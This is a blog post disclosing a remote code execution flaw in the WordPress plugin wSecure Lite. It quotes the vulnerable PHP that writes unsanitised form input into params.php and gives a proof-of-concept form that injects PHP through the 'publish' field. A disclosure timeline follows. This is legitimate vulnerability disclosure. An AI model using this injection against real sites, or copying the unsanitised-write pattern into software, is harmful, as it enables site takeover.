12 Jul

Remote Code Execution (RCE) Vulnerability in wSecure Lite

We recently disclosed a minor, but very obvious, vulnerability in a WordPress plugin for logging user activity. What we found kind of stunning about this was that the developer of the plugin was a WordPress security company that claimed to “specialize” in doing security reviews of plugins. We later got an email from someone at the company who seemed to be surprised that we would have a negative view of the security industry. We have hard time believing that someone who actually cares about security and sees what is going on would not have such a view, considering how bad things are. We recently found another reminder of that from a security plugin with an incredibly serious vulnerability.

wSecure Lite is a plugin that makes it so that visiting the normal URLs to login to the WordPress admin area does not work and instead you have to visit a special URL to login (as the name suggest there is also a paid version of the plugin). That isn’t something that really provides you much protection, as the only thing the average website needs to do in regards to login security is use a strong password. In this case though using this plugin opened you up to a remote code execution (RCE) vulnerability, which would allow a hacker to do just about anything on a website.

One of the ways we try to make sure we provide our customers with the best data of vulnerabilities in WordPress plugins is by monitoring them for hacking attempts. Starting in May this caused us to begin finding very exploitable vulnerabilities in the current version of numerous plugins. As the vulnerability began to pile up we got interested in seeing we could find additional data on what plugins hackers were interested in to see if we could improve our ability to catch this type of issue. That lead us to finding such a request for a file in wSecure lite, /wp-content/plugins/wsecure/wsecure-config.php, back in February.

Looking at that file it took hardly any time to spot a very serious issue. The file handles generating the plugin’s setting page, so it should only be accessible to Administrator lever users, but it can be accessed directly (inexplicable it is also accessible by Contributor level and above users in the admin area as well). That access allows anyone to change the plugin’s settings, meaning it would be easy for someone to disable the security provided by the plugin, but more importantly it also allows writing arbitrary code to a .php file through this piece of the code:

  $WSecureConfig = new WSecureConfig();
		$newkey = $_POST["key"]=="" ? $WSecureConfig->key : md5(base64_encode($_POST["key"])) ;
		$string = '<!--?php class WSecureConfig { var $publish = "'. $_POST["publish"]. '"; var $passkeytype = "'. $_POST["passkeytype"] . '"; var $key = "'. $newkey . '"; var $options = "'. $_POST["options"]. '"; var $custom_path = "'. $_POST["custom_path"]. '"; } ?-->';
		if (is_writable(dirname(__FILE__).'/params.php'))
			$fp = fopen(dirname(__FILE__).'/params.php', "w+");
			fwrite($fp, $string);

Using that an attacker can place malicious code in the file /wp-content/plugins/wsecure/params.php and then run it by requesting that file.

Proof of Concept

The following proof of concept will cause the file /wp-content/plugins/wsecure/params.php to display the message “Hello, world.”.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<form action="http://[path to WordPress]/wp-content/plugins/wsecure/wsecure-config.php" method="POST">
<input type="hidden" name="wsecure_action" value="update" />
<input type="hidden" name="publish" value='";} echo "Hello, world."; class WSecureConfig2 {var $test="' />
<input type="submit" value="Submit" />


  • 7/5/2016 – Developer notified.
  • 7/12/2016 – WordPress.org Plugin Directory notified.
  • 8/2/2016 – Version 2.4 released, which fixes vulnerability

One thought on “Remote Code Execution (RCE) Vulnerability in wSecure Lite

  1. Pingback: August 2016 WordPress Core, Plugins & Themes Vulnerabilities

Leave a Reply

Your email address will not be published. Required fields are marked *